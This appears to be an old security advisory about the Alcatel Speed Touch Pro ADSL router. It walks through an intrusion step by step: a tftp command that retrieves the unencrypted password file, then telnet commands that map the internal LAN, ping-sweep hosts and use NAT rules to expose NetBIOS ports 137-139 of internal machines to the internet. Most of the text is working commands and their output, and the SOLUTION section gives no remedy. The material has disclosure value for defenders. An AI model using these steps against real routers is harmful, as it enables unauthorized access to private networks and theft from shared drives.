COMMAND
ALCATEL Speed Touch PRO
SYSTEMS AFFECTED
ALCATEL Speed Touch PRO
PROBLEM
tefano Chiccarelli posted following. Taking advantage from the
ALCATEL Speed Touch Pro backdoor and configuration problems, it
is possible to obtain a "full priv" access to the router and
launch several attack against the internal LAN thanks to the
NAT/PAT feature often made available.
If the router is "telnetable" it means that "ip config
firewalling" mode is "off", accepting internet connections at the
wan interface's IP. Now the choice is a - use Shimomura Tsutomu's
Backdoor b - use this commandline
tftp -i IPTARGET GET active/system.ini
to read the unencrypted password.
Among other, it is possible To gain access to the computer(s)
behind the router. 90 over 100 times, you will find a Microsoft
based LAN (especially a NETBIOS Lan) active. So the intruder can
map the whole "network status" following the menu IP> and then
arplist. The screen looks this way
neuro@neuroneuro$ --> telnet router
Trying 192.168.0.1...
Connected to router.
Escape character is '^]'.
User :
SpeedTouch (00-90-D0-04-47-0D)
Password :
######----------------------------------------------------------------------
--
*
* ______
* ___/_____/\
* / /\\ ALCATEL ADSL MODEM
* _____/__ / \\
* _/ /\_____/___ \ Version 3.2
* // / \ /\ \
* _______//_______/ \ / _\/______ Copyright 1999-2000.
* / / \ \ / / / /\
* __/ / \ \ / / / / _\__
* / / / \_______\/ / / / / /\
* /_/______/___________________/ /________/ /___/ \
* \ \ \ ___________ \ \ \ \ \ /
* \_\ \ / /\ \ \ \ \___\/
* \ \/ / \ \ \ \ /
* \_____/ / \ \ \________\/
* /__________/ \ \ /
* \ _____ \ /_____\/
* \ / /\ \ /
* /____/ \ \ /
* \ \ /___\/
* \____\/
*
-----------------------------------------------------------------------
=>ip
[ip]=>arplist
Intf IP-address HW-address Type
eth0 192.168.0.2 00:00:b4:59:36:6c DYNAMIC
eth0 192.168.0.3 00:c0:26:ca:25:5e DYNAMIC
[ip]=>
It is even possible to check the routing table to learn the
internal LAN addressing. The command is
[ip]=>rtlist
Destination Source Gateway Intf Mtrc
192.168.0.0/24 192.168.0.0/24 192.168.0.1 eth0 1
192.168.0.1/32 0.0.0.0/0 192.168.0.1 eth0 0
217.59.X.XXX/32 0.0.0.0/0 217.59.X.XXX cip0 0
127.0.0.1/32 0.0.0.0/0 127.0.0.1 loop 0
217.59.X.XXX/30 0.0.0.0/0 217.59.X.XXX cip0 1
192.168.0.0/24 0.0.0.0/0 192.168.0.1 eth0 1
0.0.0.0/0 0.0.0.0/0 217.59.X.XXX cip0 1
Now, let's ping the other machines to find the "powered on" ones
(for sure the boxes showed by arplist, but it could exist some
"hidden" machine"):
[ip]=>:ip ping addr=192.168.0.2 count=10 size=100 interval=100 listen=off
108 bytes from 192.168.0.2: icmp_seq=0 time=2511 us
108 bytes from 192.168.0.2: icmp_seq=1 time=2337 us
108 bytes from 192.168.0.2: icmp_seq=2 time=2393 us
108 bytes from 192.168.0.2: icmp_seq=3 time=2314 us
108 bytes from 192.168.0.2: icmp_seq=4 time=2324 us
108 bytes from 192.168.0.2: icmp_seq=5 time=2333 us
108 bytes from 192.168.0.2: icmp_seq=6 time=2453 us
108 bytes from 192.168.0.2: icmp_seq=7 time=2350 us
108 bytes from 192.168.0.2: icmp_seq=8 time=2299 us
108 bytes from 192.168.0.2: icmp_seq=9 time=2353 us
We've found that the 192.168.0.2 is on, and we can redirect the
ports thanks to the NAT/PAT features, to make so that we are
allowed to access 192.168.0.2 from the outside.
It is now possible to redirect the ports 137,138,139 TCP/UDP and
map the NetBIOS resources straight to the internet. The command
is
NAT>create protocol=tcp inside_addr=192.168.0.2:137
outside_addr=217.59.9.154:137
[repeat for all the port (either tcp or udp) you are intersted in]
After this step, the intruder can open the shared directories on
the ALCATEL-behind router LAN with private IP.
\\ipdelrouteralcatel
SOLUTION
Sharing whole HD's on a private LAN is quite common, because
people feel protected from outside attacks. It is obvious that it
is possible to redirect ALL tcp/udp ports, toward those services
we know being "bugged". The only limit is the fantasy.